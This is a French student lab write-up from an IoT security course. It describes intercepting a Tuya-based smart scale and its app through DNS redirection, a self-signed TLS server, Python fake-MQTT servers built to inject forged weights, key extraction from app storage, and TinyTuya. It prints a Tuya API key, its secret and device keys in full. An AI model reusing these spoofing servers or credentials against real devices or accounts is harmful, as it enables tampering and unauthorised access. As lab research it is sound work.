14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que dès que la balance tente de se connecter elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisque qu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir un injecter le certificat dans la balance en communicant directement avec elle.

== Envoi de fausses informations vers l'application ==

Dans cette partie, nous allons tenter d'envoyer un poids à l'application depuis notre serveur.

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.

On tente donc d'envoyer en clair le poids vers l'application de Nedis<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
print(f"Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs situé dans /data/data/com.nedis.smartlife sur la VM android une clé local qui permettrai de chiffrer le message pour que Nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight>Je vais apprendre plus tard que cette clé est une clé qui permet de sécuriser l'échange Bluetooth entre la balance et le téléphone lors de la première connexion. Mais avant de le savoir, j'ai tenté d'améliorer le faux serveur avec cette clé.<syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
print(f"MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Je pense que pour faire fonctionner cette méthode, il faut absolument que je trouve la clé qui crypte le message pour que Nedis l'accepte quand il le reçoit

J'ai donc cherché dans cette direction et j'ai découvert deux choses.

Premièrement, TinyTuya, une API Python pour les appareils intelligents Tuya (génial, Nedis utilise Tuya) WiFi utilisant une connexion directe au réseau local (LAN) ou le cloud (API TuyaCloud). TinyTuya permet entre autre de récupérer la fameuse clé.

Ensuite, j'ai découvert la plateforme IOT de Tuya qui permet, en connectant son application de téléphone sur le site, de jouer avec ses appareils Tuya pour une connexion avec Home Assisant ou encore ... TinyTuya !

Spoiler alerte: J'ai du changer d'application et cette application ne tape plus sur la même adresse. Elle tape sur XX-eu.lifeaiot.com il a donc fallu refaire une redirection vers notre serveur pour ces nouvelles adresses.

Spoiler alerte: j'ai la clé. Je parle plus de TinyTuya dans la prochaine partie car même avec cette clé, ce faux serveur ne marche pas. Je vais donc tenter d'autres pistes.

== TinyTuya ==
Dans cette partie, nous allons tenter de connecter notre balance à notre faux serveur en utilisant l'utilitaire TinyTuya. Le but est de récupérer le poids de l'utilisateur de la balance lorsqu'il se pèse.

Dans un premier temps il a fallu connecter l'appli à la platforme IOT de Tuya. L'application "Nedis Smartlife" de Nedis, qui utilise bien la même base que l'application Smartlife de Tuya (oui oui c'est le même nom…) ne veux pas se connecter à la plateforme pour une raison inexplicable (et au vu du nombre de forum qui parle du sujet, je ne suis pas le seul).

J'ai donc du connecter ma balance sur l'appli Smartlife qui a bien voulu se connecter à la plateforme.

Cela me permet de récupérer avec TinyTuya les périphériques

Et je vais maintenant tenter d'expliquer le fonctionnement de TinyTuya étape par étape…

Déjà pourquoi connecter l'application avec la plateforme IOT de Tuya --> Cela permet à l'appli de récupérer les appareils connectés de mon application, elle va générer un ID et une clé.

Et comment faire pour que TinyTuya est accès aux appareils --> grâce à la commande <code>python -m tinytuya wizard</code> qui va prendre l'ID et la clé pour récupérer les appareils.

Ensuite la commande suivante va permettre à TinyTuya de détecter nos appareils qui sont effectivement connecté à notre réseau :<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya devices
TinyTuya (Tuya device scanner) [1.17.4] Loaded devices.json - 1 devices: Device Listing [
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {} } ]
</syntaxhighlight>Et la, magie, on obtient la clé de la balance, on va pouvoir enfin récupérer le poids de notre utilisateur grâce à ce code python qui écoute la balance:<syntaxhighlight lang="python">
import tinytuya

DEVICE_ID = '84853100a4e57c162d4c'
IP_ADDRESS = '172.16.10.105'
LOCAL_KEY = 'V[z^Gr|qekh]9z_>'

# Connexion à l'appareil
d = tinytuya.Device(DEVICE_ID, IP_ADDRESS, LOCAL_KEY)

d.set_version(3.3)

# Récupérer le statut
data = d.status()
print("Statut complet :", data)
</syntaxhighlight>Évidemment cela ne fonctionne pas. Et pourquoi ? Et bien si l'on regarde dans le bloc <code>python3 -m tinytuya devices TinyTuya</code> on observe que le champs mapping est vide. Ce champs est censé afficher toute les données que TinyTuya est censé pouvoir récupérer … et il est vide …

Soit je suis à l'origine de ce problème, soit TinyTuya ne permet de changer nous ampoules connecté en rouge si la balance affiche que notre objectif de poids est dépassé …

Affaire à suivre.

TODO : ne marche pas en local ? tenter d'enlever la redirection

<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya wizard -force
TinyTuya Setup Wizard [1.17.4]

Existing settings:
API Key=g5wufknjhcwqkkpsrgug
Secret=edac1effd9374f50b6c61ddd2ea1e734
DeviceID=84853100a4e57c162d4c
Region=eu

Use existing credentials (Y/n):

Download DP Name mappings? (Y/n):

Device Listing

[
{
"name": "D\u00e9tecteur de fum\u00e9e",
"id": "86730270483fda3155d0",
"key": "r@fAdR'PW~0O`v5@",
"mac": "48:3f:da:31:55:d0",
"uuid": "86730270483fda3155d0",
"sn": "1000716370419B",
"category": "ywbj",
"product_name": "Smoke detector",
"product_id": "inwnovped8h5aoaw",
"biz_type": 18,
"model": "WIFIDS20WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/651af99cad24017128e3dc2322461ae5.png",
"mapping": {
"1": {
"code": "smoke_sensor_status",
"type": "Enum",
"values": {
"range": [
"alarm",
"normal"
]
}
},
"14": {
"code": "battery_state",
"type": "Enum",
"values": {
"range": [
"low",
"middle",
"high"
]
}
}
}
},
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {}
}
]

>> Saving list to devices.json
2 registered devices saved

>> Saving raw TuyaPlatform response to tuya-raw.json

Poll local devices? (Y/n):

Scanning local network for Tuya devices...
Scan network 172.16.10.0/24 from interface eth0? ([Y]es/[n]o/[a]ll yes):
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
0 local devices discovered

Polling local devices...
[Détecteur de fumée ] Error: No IP found
[Pèse pas que des personne] Error: No IP found

>> Saving device snapshot data to snapshot.json

Done.

</syntaxhighlight><syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya wizard
TinyTuya Setup Wizard [1.17.4]

Existing settings:
API Key=g5wufknjhcwqkkpsrgug
Secret=edac1effd9374f50b6c61ddd2ea1e734
DeviceID=84853100a4e57c162d4c
Region=eu

Use existing credentials (Y/n): n

Enter API Key from tuya.com: g5wufknjhcwqkkpsrgug
Enter API Secret from tuya.com: edac1effd9374f50b6c61ddd2ea1e734
Enter any Device ID currently registered in Tuya App (used to pull full list) or 'scan' to scan for one: bf85da6b2eccef5784rydz

Region List
cn China Data Center (alias: AY)
us US - Western America Data Center (alias: AZ)
us-e US - Eastern America Data Center (alias: UE)
eu Central Europe Data Center
eu-w Western Europe Data Center (alias: WE)
in India Data Center
sg Singapore Data Center

Enter Your Region (Options: cn, us, us-e, eu, eu-w, in, or sg): eu

>> Configuration Data Saved to tinytuya.json
{
"apiKey": "g5wufknjhcwqkkpsrgug",
"apiSecret": "edac1effd9374f50b6c61ddd2ea1e734",
"apiRegion": "eu",
"apiDeviceID": "bf85da6b2eccef5784rydz"
}

Download DP Name mappings? (Y/n):

Device Listing

[
{
"name": "Ampoule Connect\u00e9e",
"id": "bf85da6b2eccef5784rydz",
"key": "ZO:}y#{'gM.QuI|T",
"mac": "10:5a:17:a9:b5:6f",
"uuid": "b73f1a854ac4219e",
"sn": "830-2-20148D",
"category": "dj",
"product_name": "Smart bulb",
"product_id": "mdzqw8qjfzfdjz9n",
"biz_type": 18,
"model": "WIFILRW10E27",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/9a70929a5f5c1855c1c091ab404b8319.png",
"mapping": {
"20": {
"code": "switch_led",
"type": "Boolean",
"values": {}
},
"21": {
"code": "work_mode",
"type": "Enum",
"values": {
"range": [
"white",
"colour",
"scene",
"music"
]
}
},
"22": {
"code": "bright_value_v2",
"type": "Integer",
"values": {
"min": 10,
"max": 1000,
"scale": 0,
"step": 1
}
},
"23": {
"code": "temp_value_v2",
"type": "Integer",
"values": {
"min": 0,
"max": 1000,
"scale": 0,
"step": 1
}
},
"25": {
"code": "scene_data_v2",
"type": "Json",
"raw_values": "{\"scene_num\":{\"min\":1,\"scale\":0,\"max\":8,\"step\":1},\"scene_units\": {\"unit_change_mode\":{\"range\":[\"static\",\"jump\",\"gradient\"]},\"unit_switch_duration\":{\"min\":0,\"scale\":0,\"max\":100,\"step\":1},\"unit_gradient_duration\":{\"min\":0,\"scale\":0,\"max\":100,\"step\":1},\"bright\":{\"min\":0,\"scale\":0,\"max\":1000,\"step\":1},\"temperature\":{\"min\":0,\"scale\":0,\"max\":1000,\"step\":1},\"h\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":360,\"step\":1},\"s\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1},\"v\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}}}",
"values": {
"scene_num": {
"min": 1,
"scale": 0,
"max": 8,
"step": 1
},
"scene_units": {
"unit_change_mode": {
"range": [
"static",
"jump",
"gradient"
]
},
"unit_switch_duration": {
"min": 0,
"scale": 0,
"max": 100,
"step": 1
},
"unit_gradient_duration": {
"min": 0,
"scale": 0,
"max": 100,
"step": 1
},
"bright": {
"min": 0,
"scale": 0,
"max": 1000,
"step": 1
},
"temperature": {
"min": 0,
"scale": 0,
"max": 1000,
"step": 1
},
"h": {
"min": 0,
"scale": 0,
"unit": "",
"max": 360,
"step": 1
},
"s": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"v": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
}
}
}
},
"26": {
"code": "countdown_1",
"type": "Integer",
"values": {
"unit": "s",
"min": 0,
"max": 86400,
"scale": 0,
"step": 1
}
},
"28": {
"code": "control_data",
"type": "Json",
"raw_values": "{\"change_mode\":{\"range\":[\"direct\",\"gradient\"]}, \"bright\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}, \"temperature\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}, \"h\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":360,\"step\":1},\"s\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":255,\"step\":1},\"v\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":255,\"step\":1}}",
"values": {
"change_mode": {
"range": [
"direct",
"gradient"
]
},
"bright": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"temperature": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"h": {
"min": 0,
"scale": 0,
"unit": "",
"max": 360,
"step": 1
},
"s": {
"min": 0,
"scale": 0,
"unit": "",
"max": 255,
"step": 1
},
"v": {
"min": 0,
"scale": 0,
"unit": "",
"max": 255,
"step": 1
}
}
},
"30": {
"code": "rhythm_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"31": {
"code": "sleep_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"32": {
"code": "wakeup_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"41": {
"code": "remote_switch",
"type": "Boolean",
"values": {}
}
}
}
]

>> Saving list to devices.json
1 registered devices saved

>> Saving raw TuyaPlatform response to tuya-raw.json

Poll local devices? (Y/n):

Scanning local network for Tuya devices...
1 local devices discovered

Polling local devices...
[Ampoule Connectée ] 172.16.10.108 - [On] - DPS: {'20': True, '21': 'white', '22': 1000, '23': 1000, '25': '000e0d0000000000000000c80000', '26': 0, '41': True}

>> Saving device snapshot data to snapshot.json

>> Saving IP addresses to devices.json
1 device IP addresses found

Done.

</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2026-01-13T17:27:59Z

Vdetrez : /* TinyTuya */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
